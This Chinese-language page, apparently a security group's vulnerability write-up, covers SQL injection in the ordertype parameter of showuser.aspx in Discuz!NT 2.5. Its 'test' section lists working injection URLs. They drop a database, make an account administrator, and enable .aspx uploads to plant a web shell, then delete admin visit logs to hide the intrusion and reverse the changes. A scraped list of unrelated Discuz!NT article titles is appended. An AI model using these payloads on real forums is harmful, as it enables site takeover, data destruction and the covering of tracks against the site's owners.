漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。
Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。

漏洞厂商:http://www.comsenz.com

漏洞解析:在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞。

漏洞测试:
http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';--//更新为管理员

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- //更新为aspx可上传

得到SHELL后...

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- //更新回JPG

http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- //删除日志

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';--//取消管理员

ISTO  有你更精彩---

Discuz!NT 2.5(20080826更新前)注入相关推荐

  1. Discuz!NT 2.0正式版提供免费下载(最后更新2007-12-26)ASP.net

    导读: 中国最大的互联网社区产品及服务提供商康盛创想于 11 月15 日发布旗下基于 ASP.net 平台的社区软件 Discuz!NT 2.0 正式版,用户可以免费下载. Discuz!NT 2.0 ...

  2. Discuz!NT 在线用户功能简介

    声明:本文内容纯属个人观点,官方保留最终解释 在上文(Discuz!NT URL地址重写) 中, 聊到了"在线用户"功能,因为当时介绍的重点不是"在线" 那一块 ...

  3. 【转载】Discuz!NT企业版之Sphinx全文搜索

    Discuz!NT企业版之Sphinx全文搜索(上) 作为Discuz!NT企业版中的一员,在设计企业级搜索架构之初,就考虑了海量数量,准实时索引更新,并发访问,安装布署等诸多方面.目前在生产环境下被 ...

  4. Discuz!NT控件剖析 之 DataGrid(数据列表) [原创: 附源码]

    自从 9月未开始写关于"ICONIX方法"的系列文章以来,到今天已有两个多月了,当初因为兴趣点的转移才划一 段落的Discuz!NT 系列文章,从今天开始又要开始续写了.这写这个系 ...

  5. Discuz!NT 缓存设计简析 [原创]

    作为一个社区类型软件,大并发支持和高效稳定运行永远是"硬道理",而有效安全的使用 缓存恰恰能起到事倍功半的效果.而.NET本身所提供的缓存机制又显得过于"单薄" ...

  6. discuz!nt论坛搬迁后出错,提示:对象名 'dnt_templates' 无效

    2007年10月30日 星期二 16:23 对象名 'dnt_templates' 无效解决方法: --解决重装系统并还原论坛数据库后,数据库帐号不关联的问题. --注意请用sa帐号 进行如下操作 - ...

  7. Discuz!NT实际安装流程

    1.      Discuz!NT论坛的安装 安装前系统环境: 操作系统:XP Professional 数据库: SQL server 2005 IIS 5.1 .net FrameWork 3.5 ...

  8. ASP.NET网站与Discuz!NT论坛整合

    1.引入5个DLL到项目中 分别是 using Discuz.Common; using Discuz.Forum; using Discuz.Config; using Discuz.Entity; ...

  9. Discuz NT 架构剖析之Config机制

    接触了Discuz NT! 一段时间了,是时候做个总结了,标题好霸气,有木有? 都是托园子里的大牛代振军的福啊,哈哈哈哈. 首先论坛的信息不是完全存储在数据库里面的,一部分信息存储在config文件里 ...

最新文章

  1. HDU3371(最小生成树)
  2. 腾讯云微计算实践:从Serverless说起,谈谈边缘计算的未来
  3. 学习 TList 类的实现[5]
  4. python3 sys.stdout.write print 区别
  5. Windows 8 系列 --Block Game --随笔
  6. layui按钮展开、_layui框架,点击某个按钮,让layui的日期插件选中的值清空
  7. 51nod1676-无向图同构【乱搞】
  8. source insight使用教程
  9. LSSS线性秘密共享方案详细构造方法与原理解释试读
  10. 求平均数、百分率、最大值、最小值、两个字段相差秒数的SQL
  11. java 预览office_java在线预览office
  12. 计算机基础知识会议记录,电脑上会议记录怎么写?
  13. 利用原生JS将下载链接转换为二维码
  14. Python -- 使用if语句处理列表
  15. C++ 判断某个年份的生肖
  16. iOS 加粗字体方法 (不改变字体字号只加粗文字)
  17. Debian7.5--双屏显示问题
  18. 【HTML5】------- JavaScript 实现网页版HTML5发送语音功能
  19. Oracle开发篇---------PL/SQL DEV频繁卡顿的解决方案
  20. 高并发与大流量解决方案

热门文章

  1. 计算机科学优青,关于举办华南理工大学“海内外优秀青年学者论坛” 计算机科学与工程学院分论坛的通知...
  2. JavaScript——misc
  3. 如何让64位的windows上的IIS可以运行32位的程序
  4. OSChina 周日乱弹 —— 钱不还,我就当你人不在了
  5. Android 性能优化之String篇
  6. 在不同领域中典型的计算机应用实例,浅析案例教学法在《计算机应用基础》教学中应用.doc...
  7. Amazon DMS 在数据迁移任务可用性及对源数据归档支持的实践
  8. LeetCodeOJ. Count and Say
  9. HTML CSS 程序员花式表白
  10. JConsole远程连接